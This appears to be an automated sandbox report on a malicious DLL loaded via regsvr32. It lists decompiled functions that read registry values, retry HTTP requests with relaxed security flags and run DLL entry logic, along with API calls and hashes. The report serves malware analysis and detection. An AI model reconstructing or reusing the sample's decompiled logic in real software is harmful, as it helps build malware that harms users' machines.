                                      • Part of subcall function 6E2A109B: GetLastError.KERNEL32 ref: 6E2A111F
                                      • Part of subcall function 6E2A109B: CloseHandle.KERNEL32(00000000), ref: 6E2A1154
                                    • ExitThread.KERNEL32 ref: 6E2A1D8F
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlen
                                    • String ID:
                                    • API String ID: 4209869662-0
                                    • Opcode ID: 0b7cb6bcc26a777c81fadae5148854af98b7bfb7702008d69438ba4050da7605
                                    • Instruction ID: c3064a6d9410010cf8ac58330e4fd7e90868374d9cb6c0d8d5a0ec07a1eb846f
                                    • Opcode Fuzzy Hash: 0b7cb6bcc26a777c81fadae5148854af98b7bfb7702008d69438ba4050da7605
                                    • Instruction Fuzzy Hash: AC119DB2104A0AAFDB01CBACCC48D8B77EEFB45764F050A16F650D7150DB30E58ACBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A3B34, Relevance: 4.6, APIs: 3, Instructions: 54registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E001A3B34(void* __ecx, void* __eflags) {
				char _v8;
				void* _v12;
				int _v16;
				int _v20;
				intOrPtr _t15;
				intOrPtr _t19;
				long _t24;
				long _t29;
				short* _t31;
				short* _t34;

				_t15 =  *0x1aa2d4; // 0x314d7d0
				_v8 = _v8 & 0x00000000;
				_t3 = _t15 + 0x1aba40; // 0x4f0053
				_v16 = 4;
				_t31 = E001A1440(__ecx, _t3);
				if(_t31 != 0) {
					_t19 =  *0x1aa2d4; // 0x314d7d0
					_t5 = _t19 + 0x1aba9c; // 0x6e0049
					_t34 = E001A1440(__ecx, _t5);
					if(_t34 != 0) {
						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
						if(_t24 == 0) {
							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
							if(_t29 != 0) {
								_v8 = _v8 & 0x00000000;
							}
							RegCloseKey(_v12);
						}
						E001A77EC(_t34);
					}
					E001A77EC(_t31);
				}
				return _v8;
			}













                                    0x001a3b3a
                                    0x001a3b3f
                                    0x001a3b44
                                    0x001a3b4b
                                    0x001a3b57
                                    0x001a3b5b
                                    0x001a3b5d
                                    0x001a3b63
                                    0x001a3b6f
                                    0x001a3b73
                                    0x001a3b86
                                    0x001a3b8e
                                    0x001a3ba2
                                    0x001a3baa
                                    0x001a3bac
                                    0x001a3bac
                                    0x001a3bb3
                                    0x001a3bb3
                                    0x001a3bba
                                    0x001a3bba
                                    0x001a3bc0
                                    0x001a3bc5
                                    0x001a3bcb

                                    APIs
                                      • Part of subcall function 001A1440: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,001A3B57,004F0053,00000000,?), ref: 001A1449
                                      • Part of subcall function 001A1440: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,001A3B57,004F0053,00000000,?), ref: 001A1473
                                      • Part of subcall function 001A1440: memset.NTDLL ref: 001A1487
                                    • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 001A3B86
                                    • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000004,00000000,00000004), ref: 001A3BA2
                                    • RegCloseKey.ADVAPI32(00000000), ref: 001A3BB3
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: CloseOpenQueryValuelstrlenmemcpymemset
                                    • String ID:
                                    • API String ID: 830012212-0
                                    • Opcode ID: 2496023c26c84e4a15067c38dc940b3319d3ff1d1a999b837694e6c4cd426c92
                                    • Instruction ID: 31b489b92a116db2538338f6a07ffbc6576c7060d8962308dde8ac86cc24cfac
                                    • Opcode Fuzzy Hash: 2496023c26c84e4a15067c38dc940b3319d3ff1d1a999b837694e6c4cd426c92
                                    • Instruction Fuzzy Hash: C0115B7A600209BFDB11DBD8CD89FAEB7BCAF06300F140099F201E7052EB749A08DB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A2566, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 52COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 32%
                                    			E001A2566(intOrPtr _a4, signed int _a8) {
				long _v8;
				long _v12;
				char _v16;
				void* _t14;
				long _t15;
				char* _t17;
				intOrPtr* _t19;
				signed int _t22;

				_t19 = __imp__; // 0x72b2797d
				_t22 =  ~_a8;
				_v12 = 0;
				asm("sbb esi, esi");
				while(1) {
					_v8 = 0;
					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed
					if(_t14 != 0) {
						break;
					}
					_t15 = GetLastError();
					_v8 = _t15;
					if(_t15 != 0x2f8f) {
						if(_t15 == 0x2f00) {
							continue;
						}
					} else {
						_v16 = 0x3300;
						if(_v12 == 0) {
							_t17 =  &_v16;
							__imp__(_a4, 0x1f, _t17, 4);
							if(_t17 == 0) {
								_v8 = GetLastError();
							} else {
								_v12 = 1;
								continue;
							}
						}
					}
					L9:
					return _v8;
				}
				goto L9;
			}











                                    0x001a256d
                                    0x001a257a
                                    0x001a257c
                                    0x001a257f
                                    0x001a25c4
                                    0x001a25cc
                                    0x001a25d2
                                    0x001a25d6
                                    0x00000000
                                    0x00000000
                                    0x001a2583
                                    0x001a258e
                                    0x001a2591
                                    0x001a25c2
                                    0x00000000
                                    0x00000000
                                    0x001a2593
                                    0x001a2596
                                    0x001a259d
                                    0x001a25a1
                                    0x001a25aa
                                    0x001a25b2
                                    0x001a25e0
                                    0x001a25b4
                                    0x001a25b4
                                    0x00000000
                                    0x001a25b4
                                    0x001a25b2
                                    0x001a259d
                                    0x001a25e3
                                    0x001a25ea
                                    0x001a25ea
                                    0x00000000

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ErrorLast
                                    • String ID: b+t
                                    • API String ID: 1452528299-83008628
                                    • Opcode ID: f7a7592a9a136d7bde2e305725e35e35fef1ad2588f2e9d4ef688f4874ecbc18
                                    • Instruction ID: 8bdd336e1602a4dff016785ea02a4023591e92a790557b064a607e704ede9dbc
                                    • Opcode Fuzzy Hash: f7a7592a9a136d7bde2e305725e35e35fef1ad2588f2e9d4ef688f4874ecbc18
                                    • Instruction Fuzzy Hash: 430129B9D00109FBDF109F9ADC58DEEBFB8FB96750F108166E900E6190D7718A84DB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2C7D4A, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 6E2C7D6F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Info
                                    • String ID:
                                    • API String ID: 1807457897-3916222277
                                    • Opcode ID: a982c09cff08d1670b5db547a0dcff4f898120f127031bbdbad99bdc31e6bf8c
                                    • Instruction ID: f986e258283acc58b55c60c2d8bea33f0ff87ec0b561c0c77a3e0bf648c25642
                                    • Opcode Fuzzy Hash: a982c09cff08d1670b5db547a0dcff4f898120f127031bbdbad99bdc31e6bf8c
                                    • Instruction Fuzzy Hash: F241187150429C9FDB628EB8CC84EE67BFFEB06B08F1405ECD59987182D2359E45CB62
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2C809F, Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 6E2C7C72: GetOEMCP.KERNEL32(00000000,?,?,6E2C7EFB,?), ref: 6E2C7C9D
                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,6E2C7F40,?,00000000), ref: 6E2C8113
                                    • GetCPInfo.KERNEL32(00000000,6E2C7F40,?,?,?,6E2C7F40,?,00000000), ref: 6E2C8126
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: CodeInfoPageValid
                                    • String ID:
                                    • API String ID: 546120528-0
                                    • Opcode ID: fbbc4d01b8fa773e8cb1deac3784df7a02c2a59e26462ef1047687681b0cb9f9
                                    • Instruction ID: 3b114e601f68d87f487e84293577620141d75b418500e1bb86374dcde28f99e1
                                    • Opcode Fuzzy Hash: fbbc4d01b8fa773e8cb1deac3784df7a02c2a59e26462ef1047687681b0cb9f9
                                    • Instruction Fuzzy Hash: 0851577090068E9FD7988FB5C894AABBBFBEF41B00F14866EC09987140D7B5A501CB93
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A18B7, Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 75%
                                    			E001A18B7(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t76 = E001A56E3(_v8, _a8, _a12, _a20,  &_a20,  &_a12);
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x1aa2d4; // 0x314d7d0
						_t20 = _t68 + 0x1ab1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E001A609E(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}




















                                    0x001a18bd
                                    0x001a18c0
                                    0x001a18d0
                                    0x001a18d9
                                    0x001a18dd
                                    0x001a19ab
                                    0x001a19b1
                                    0x001a19b1
                                    0x001a18fc
                                    0x001a1900
                                    0x001a1906
                                    0x001a190b
                                    0x001a1912
                                    0x001a1921
                                    0x001a1921
                                    0x001a1925
                                    0x001a1927
                                    0x001a1933
                                    0x001a193e
                                    0x001a1949
                                    0x001a194d
                                    0x001a1957
                                    0x001a195b
                                    0x001a195d
                                    0x001a1962
                                    0x001a1969
                                    0x001a1979
                                    0x001a1979
                                    0x001a1962
                                    0x001a195b
                                    0x001a197b
                                    0x001a1980
                                    0x001a1985
                                    0x001a1985
                                    0x001a198b
                                    0x001a1991
                                    0x001a1996
                                    0x001a1996
                                    0x001a199b
                                    0x001a19a0
                                    0x001a19a0
                                    0x001a199b
                                    0x001a1925
                                    0x001a19a2
                                    0x001a19a8
                                    0x00000000

                                    APIs
                                      • Part of subcall function 001A56E3: SysAllocString.OLEAUT32(80000002), ref: 001A573A
                                      • Part of subcall function 001A56E3: SysFreeString.OLEAUT32(00000000), ref: 001A579F
                                    • SysFreeString.OLEAUT32(?), ref: 001A1996
                                    • SysFreeString.OLEAUT32(001A5BA8), ref: 001A19A0
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: String$Free$Alloc
                                    • String ID:
                                    • API String ID: 986138563-0
                                    • Opcode ID: 2806767892cfdc245d1f0474c19cffb4f1a76ae73fc8284f1a77c5e65539324b
                                    • Instruction ID: 55ffaeb34ef67fb163a58e8b504af68c4fc97ef772fb23437b76545aeb39c0e4
                                    • Opcode Fuzzy Hash: 2806767892cfdc245d1f0474c19cffb4f1a76ae73fc8284f1a77c5e65539324b
                                    • Instruction Fuzzy Hash: B4313B76900119BFCB11DF65C898C9BBB79FFCA744B144658F8069B210D331AD92CBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A2989, Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                    Download Yara Rule
                                    APIs
                                    • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 001A29B1
                                      • Part of subcall function 001A18B7: SysFreeString.OLEAUT32(?), ref: 001A1996
                                    • SafeArrayDestroy.OLEAUT32(?), ref: 001A29FE
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ArraySafe$CreateDestroyFreeString
                                    • String ID:
                                    • API String ID: 3098518882-0
                                    • Opcode ID: 7b3834c0fe1c6a284b3dd562eb025a41fa3f8e56479373da9d8810c4799adf03
                                    • Instruction ID: 5160b4f8f8d4f291f45a8272fb7651e16e9d0ee664bc00574d4bd42208318523
                                    • Opcode Fuzzy Hash: 7b3834c0fe1c6a284b3dd562eb025a41fa3f8e56479373da9d8810c4799adf03
                                    • Instruction Fuzzy Hash: 1A118E36A0010ABFDB01DFA8CC44AEEBBB8EF05350F008021FA04E7161E3789A55DB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A3D26, Relevance: 3.0, APIs: 2, Instructions: 47memorytimeCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E001A3D26(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				signed int _t11;
				void* _t19;
				void* _t20;
				void* _t22;
				void* _t23;
				signed short* _t24;

				_t22 = __edx;
				_t23 = E001A5691(_t11, _a12);
				if(_t23 == 0) {
					_t20 = 8;
				} else {
					_t24 = _t23 + _a16 * 2;
					 *_t24 =  *_t24 & 0x00000000;
					_t20 = E001A6CF1(__ecx, _a4, _a8, _t23);
					if(_t20 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						 *_t24 = 0x5f;
						_t19 = E001A2A18(_t22, _a4, 0x80000001, _a8, _t23,  &_v12, 8); // executed
						_t20 = _t19;
					}
					HeapFree( *0x1aa290, 0, _t23);
				}
				return _t20;
			}










                                    0x001a3d26
                                    0x001a3d37
                                    0x001a3d3b
                                    0x001a3d94
                                    0x001a3d3d
                                    0x001a3d44
                                    0x001a3d4a
                                    0x001a3d53
                                    0x001a3d57
                                    0x001a3d5d
                                    0x001a3d6d
                                    0x001a3d7a
                                    0x001a3d7f
                                    0x001a3d7f
                                    0x001a3d8a
                                    0x001a3d8a
                                    0x001a3d9b

                                    APIs
                                      • Part of subcall function 001A5691: lstrlen.KERNEL32(?,00000000,032F9F00,754B94D8,001A291A,032FA0FD,001A5FB9,001A5FB9,?,001A5FB9,?,69B25F44,E8FA7DD7,00000000), ref: 001A5698
                                      • Part of subcall function 001A5691: mbstowcs.NTDLL ref: 001A56C1
                                      • Part of subcall function 001A5691: memset.NTDLL ref: 001A56D3
                                    • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74EC1499,00000008,00000014,004F0053,032F9534), ref: 001A3D5D
                                    • HeapFree.KERNEL32(00000000,00000000,004F0053), ref: 001A3D8A
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                    • String ID:
                                    • API String ID: 1500278894-0
                                    • Opcode ID: e4ab326d91151b637faf8e13d352ed55cd54dc9abd37a795dde049ce54743e4d
                                    • Instruction ID: 75ff817002411b49f78d22e24858f60e314242f001f73bfb8e607e325b2ee094
                                    • Opcode Fuzzy Hash: e4ab326d91151b637faf8e13d352ed55cd54dc9abd37a795dde049ce54743e4d
                                    • Instruction Fuzzy Hash: 6E01F236100209BBDB215F98DC44FCA7B7DFF82350F500024FE449A060EB71D964C750
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2C33AF, Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                    Download Yara Rule
                                    APIs
                                    • dllmain_crt_process_attach.LIBCMT ref: 6E2C33E5
                                    • dllmain_crt_process_detach.LIBCMT ref: 6E2C33F8
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                                    • String ID:
                                    • API String ID: 3750050125-0
                                    • Opcode ID: 80260636c51fcd502011e63202024609385447e13dc8c82ea2f2cfaa7c8672f8
                                    • Instruction ID: 9098a98c0bf9c2a80afd01addecb391cef07d04d83716a9b90e828ba94013c1d
                                    • Opcode Fuzzy Hash: 80260636c51fcd502011e63202024609385447e13dc8c82ea2f2cfaa7c8672f8
                                    • Instruction Fuzzy Hash: C8E030321A424FDBC7C21DFAD51DBA9368BB706E16F404FD1B410C64A0CF66C252D5A3
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A695B, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				signed int _t11;
				void* _t13;

				_t13 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x1aa294) == 0) {
						E001A38BC();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x1aa294) == 1) {
						_t10 = E001A6632(_t11, _a4); // executed
						if(_t10 != 0) {
							_t13 = 0;
						}
					}
				}
				return _t13;
			}







                                    0x001a6962
                                    0x001a6963
                                    0x001a6966
                                    0x001a6998
                                    0x001a699a
                                    0x001a699a
                                    0x001a6968
                                    0x001a6969
                                    0x001a697e
                                    0x001a6985
                                    0x001a6987
                                    0x001a6987
                                    0x001a6985
                                    0x001a6969
                                    0x001a69a2

                                    APIs
                                    • InterlockedIncrement.KERNEL32(001AA294), ref: 001A6970
                                      • Part of subcall function 001A6632: HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001), ref: 001A6647
                                    • InterlockedDecrement.KERNEL32(001AA294), ref: 001A6990
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Interlocked$CreateDecrementHeapIncrement
                                    • String ID:
                                    • API String ID: 3834848776-0
                                    • Opcode ID: eee3ee55df198c365a23c9c263320a8161014d18abe55e915bf22507f85c71ff
                                    • Instruction ID: 335c97b7d50ed95d80a3cf9283aec3a04ec24bdcae012b54edf4756480fddd8f
                                    • Opcode Fuzzy Hash: eee3ee55df198c365a23c9c263320a8161014d18abe55e915bf22507f85c71ff
                                    • Instruction Fuzzy Hash: 29E01A2E2442239A86221B748D1475FF7549B13F88B095514B459D1074C724DC908692
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2C4D88, Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 6E2C4F91: try_get_function.LIBVCRUNTIME ref: 6E2C4FA6
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E2C4DA6
                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 6E2C4DB1
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                    • String ID:
                                    • API String ID: 806969131-0
                                    • Opcode ID: 37ec313d12d833697cc84517c0fe3ef81ff4a7ef36d24a362fbf5e08cd8e7b17
                                    • Instruction ID: 81418ee342590cb3c3dfc499127188fe77d539e46b7592595944f3818c7434b0
                                    • Opcode Fuzzy Hash: 37ec313d12d833697cc84517c0fe3ef81ff4a7ef36d24a362fbf5e08cd8e7b17
                                    • Instruction Fuzzy Hash: 51D0A7284A820E5F99C439F8ED044CB27ABDC52F7E3700F47E020C95C4DB1480439017
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2A1741, Relevance: 2.5, APIs: 2, Instructions: 48memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 84%
                                    			E6E2A1741(void* __ecx) {
				void* _v8;
				char _v12;
				signed short _t15;
				char* _t18;
				char* _t25;
				char* _t29;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t25 = 0;
				if(E6E2A1344( &_v8,  &_v12,  *0x6e2a41cc ^ 0x13b675ce) != 0) {
					if(_v8 == 0) {
						_t29 = 0;
					} else {
						_t29 = E6E2A20BB(_t22, _v8,  *0x6e2a41cc ^ 0x64927f78);
					}
					if(_t29 != 0) {
						_t15 = E6E2A105E(_t22); // executed
						_v12 = _t15 & 0x0000ffff;
						_t18 = StrStrIA(_t29,  &_v12); // executed
						if(_t18 != 0) {
							_t25 = 0x657;
						}
					}
					HeapFree( *0x6e2a4190, 0, _v8);
				}
				return _t25;
			}









                                    0x6e2a1741
                                    0x6e2a1744
                                    0x6e2a1745
                                    0x6e2a175b
                                    0x6e2a1764
                                    0x6e2a1769
                                    0x6e2a1782
                                    0x6e2a176b
                                    0x6e2a177e
                                    0x6e2a177e
                                    0x6e2a1786
                                    0x6e2a1788
                                    0x6e2a1790
                                    0x6e2a1798
                                    0x6e2a17a0
                                    0x6e2a17a2
                                    0x6e2a17a2
                                    0x6e2a17a0
                                    0x6e2a17b2
                                    0x6e2a17b2
                                    0x6e2a17bd

                                    APIs
                                    • StrStrIA.SHLWAPI(00000000,6E2A1A94), ref: 6E2A1798
                                    • HeapFree.KERNEL32(00000000,?,?), ref: 6E2A17B2
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID:
                                    • API String ID: 3298025750-0
                                    • Opcode ID: 0c60af501eef954245d08c53f804b2c438d1fbba5cd0ab0da1ddc3b7fa019f15
                                    • Instruction ID: 09331d1b9b2ef66dbabfb3123ab69f08a45ee2d0c052733f17eb072376036e3b
                                    • Opcode Fuzzy Hash: 0c60af501eef954245d08c53f804b2c438d1fbba5cd0ab0da1ddc3b7fa019f15
                                    • Instruction Fuzzy Hash: A30171B6900519BBCB008BE98C44DEF77AFAB45711B100161AA01E3140EB71DA45D6B0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2C6E8B, Relevance: 1.6, APIs: 1, Instructions: 65COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 6E2C6EF8
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: __crt_fast_encode_pointer
                                    • String ID:
                                    • API String ID: 3768137683-0
                                    • Opcode ID: c81ab07769dfaccaa79adecfcde9f785b0dea6da290d8cebedfb8951aba84883
                                    • Instruction ID: 41dcabd4c07c14438a675cc5f4a68d9451bf6433ce4c2c0256000cbc30d4ad57
                                    • Opcode Fuzzy Hash: c81ab07769dfaccaa79adecfcde9f785b0dea6da290d8cebedfb8951aba84883
                                    • Instruction Fuzzy Hash: 2411EB33A3492B9F9F519E99D8D4DAA3397EB85F207120311ED169B244D730DC01C7D2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2C9DB4, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 6E2C75C0: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6E2C7601
                                    • _free.LIBCMT ref: 6E2C9E20
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
